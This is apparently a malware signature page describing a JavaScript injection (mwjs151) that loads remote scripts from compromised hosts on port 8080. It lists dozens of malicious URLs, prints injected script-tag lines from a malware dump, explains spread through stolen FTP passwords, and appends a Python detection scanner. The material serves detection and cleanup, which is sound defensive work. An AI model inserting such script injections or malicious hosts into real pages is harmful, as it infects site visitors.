SiteCheck Signatures

malware-entry-mwjs151

Description:
JavaScript malware used to load a virus onto the visitors of an infected web site.
The JavaScript is not encoded and uses varying domain names and file names (generally on port 8080):

http://adoffy.alltuckedinathome.com:8080/JavaScript.js 
http://adoffy.alltuckedinathome.com:8080/LED.js 
http://adoffy.alltuckedinathome.com:8080/Upload.js 
http://aospfpgy.dogplaystation.com:8080/Page_View.js 
http://asoosp.acilalisveris.com:8080/Excel.js 
http://assolkh.blackhulu.com:8080/Refresh.js 
http://assolkh.blackhulu.com:8080/Yahoo.js 
http://assol.metro-trading.net:8080/Link.js 
http://blog.aspdesign.net:8080/Bandwidth.js 
http://blog.aspdesign.net:8080/Default.js 
http://blog.locatejobs.org:8080/Joystick.js 
http://bmh-services.co.uk/flash/contact.php 
http://cache.goodnews.fm:8080/LinkedIn.j 
http://cache.xn--mgbay6fcq.com:8080/Optical_Drive.js 
http://diamondbar.la/forums/index8aug.php 
http://dodo.busop.info:8080/Bcc.js 
http://dodo.busop.info:8080/Unfriend.js 
http://dodo.busop.info:8080/Website.js 
http://dolfy.sedonahyperbarics.com:8080/Bcc.js 
http://dolfy.sedonahyperbarics.com:8080/Gnutella.js 
http://dolfy.sedonahyperbarics.com:8080/GUI.js 
http://dolgo.lulucabana.com:8080/Link.js 
http://dolgo.lulucabana.com:8080/Macintosh.js 
http://e-maks.pl/_tmp/product.php 
http://foxy.divarug.com:8080/Mac_OS.js 
http://governance4it.de/tmp/CHANGELOG.php 
http://hoploiyt.hyipface.com:8080/Defragment.js 
http://inc.lamcfoundation.com:8080/Access_Point.js 
http://inc.lamcfoundation.com:8080/Kibibyte.js 
http://kollinsoy.skyefenton.com:8080/AGP.js 
http://kollinsoy.skyefenton.com:8080/Telnet.js 
http://kollinsoy.skyefenton.com:8080/Web_Page.js 
http://lurralde.com/ficheros/pedidos-lurralde.php 
http://luxuryretreatsatcapcana.com/userfiles/email.php 
http://mayaheritage.com/asset/500.php 
http://mking-designs.com/administrator/error_log.php 
http://oployau.fancountblogger.com:8080/Backup.js 
http://printinstant.com/xmlrpc/decoder.php 
http://ruesri.com/plugins/gem.php 
http://sfofotky.iexam.info:8080/Mebibyte.js 
http://sokyoss.drelshazly.com:8080/E-commerce.js 
http://sokyoss.drelshazly.com:8080/Emoticon.js 
http://solk.seamscreative.info:8080/JPEG.js 
http://ssrksodra.com/gammalt/inca_200.php 
http://soaoo.blog-salopes.com:8080/Unmount.js 
http://eurppa.buildadamshomes.com:8080/Paste.js 
http://questtore.hermosayasociados.com:8080/Password.js 
http://kolpo.gunterschaub.com:8080/Keywords.js 
http://temp.aspdesign.net:8080/RADCAB.js 
http://temp.hbsouthmomsclub.com:8080/Name_Server.js 
http://assol.wedonate.info:8080/Laptop.js 

Affecting:
The malware infects the web site through a compromised desktop (infected with a virus): it steals any password stored in the FTP client and uses it to attack the sites.
Note that every PHP, HTML and JS file gets compromised by this malware.

Clean up:
The desktop must be cleaned up first. Use multiple AVs if necessary, since this virus is very good at hiding from the AV that is currently running. Once it is clean, you can clean up the sites and change the passwords. You can also sign up with us and let our team remove the malware for you.

Malware dump:

document . write('< ' + ' cript src="http://oployau.fancountblogger.com:8080/Backup.js
< script src=" http://hoploiyt.hyipface.com:8080/Zip.js">
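The description and the dump above give two things a responder can match on when checking a site after the desktop has been cleaned: a document.write() that assembles a script tag from string fragments, and a remote .js file fetched from a host on port 8080. The scanner below is an added example, not Sucuri's SiteCheck code; it assumes a hypothetical web root passed to scan_tree(), uses only a subset of the hosts from the list above, and runs on a constructed sample of an infected index.php plus the first dump line as extracted.

```python
import os
import re
from dataclasses import dataclass
from typing import Iterator, List, Tuple

# Hosts copied from the signature's URL list above (a subset, enough to show the lookup).
MWJS151_HOSTS = frozenset({
    "adoffy.alltuckedinathome.com",
    "dodo.busop.info",
    "hoploiyt.hyipface.com",
    "oployau.fancountblogger.com",
    "sokyoss.drelshazly.com",
})

# A remote script fetched over port 8080, the pattern every .js URL on the list shares.
PORT8080_JS = re.compile(r"https?://([A-Za-z0-9.-]+):8080/[^\s\"'<>]*\.js", re.I)

# document.write() that glues a <script> tag together from string fragments,
# tolerating the stray spaces and the dropped "s" seen in the dump above.
SPLIT_WRITE = re.compile(
    r"document\s*\.\s*write\s*\(\s*['\"]<\s*s?\s*['\"]\s*\+\s*['\"]\s*s?cript\b", re.I)

# The file types the page says get compromised.
SCAN_SUFFIXES = (".php", ".html", ".htm", ".js")


@dataclass
class Finding:
    line_no: int
    host: str          # host of the injected script URL
    split_write: bool  # tag was assembled via document.write('<s' + 'cript ...')
    known: bool        # host appears in the signature's list


def scan_text(text: str) -> List[Finding]:
    """Return one Finding per :8080 script URL found in `text`, line by line."""
    findings: List[Finding] = []
    for line_no, line in enumerate(text.splitlines(), 1):
        split = SPLIT_WRITE.search(line) is not None
        for match in PORT8080_JS.finditer(line):
            host = match.group(1).lower()
            findings.append(Finding(line_no, host, split, host in MWJS151_HOSTS))
    return findings


def scan_tree(root: str) -> Iterator[Tuple[str, Finding]]:
    """Walk a web root (hypothetical path) and yield (path, Finding) for PHP/HTML/JS hits."""
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(SCAN_SUFFIXES):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for finding in scan_text(fh.read()):
                        yield path, finding


# Constructed sample of an infected index.php (not a real capture): one clean
# local script, one split document.write injection, one plain injected tag.
SAMPLE_INDEX_PHP = """<?php include 'header.php'; ?>
<script src="/js/app.js"></script>
document.write('<s' + 'cript src="http://oployau.fancountblogger.com:8080/Backup.js"></s' + 'cript>');
<script src="http://hoploiyt.hyipface.com:8080/Zip.js"></script>
<script src="https://cdn.example.org/lib.js"></script>
"""

# The first dump line from the page, as extracted (spaces and missing "s" included).
DUMP_LINE = "document . write('< ' + ' cript src=\"http://oployau.fancountblogger.com:8080/Backup.js"

if __name__ == "__main__":
    for f in scan_text(SAMPLE_INDEX_PHP):
        flag = "KNOWN" if f.known else "unknown"
        extra = ", split document.write" if f.split_write else ""
        print(f"line {f.line_no}: {f.host} ({flag}{extra})")
```

Two hits come back for the sample (lines 3 and 4), both on hosts from the list, and the dump line itself is flagged as a split document.write despite its extraction damage. An unlisted host on port 8080 is still reported, just with known=False, which is the behaviour you want since the description says the domain and file names vary between infections.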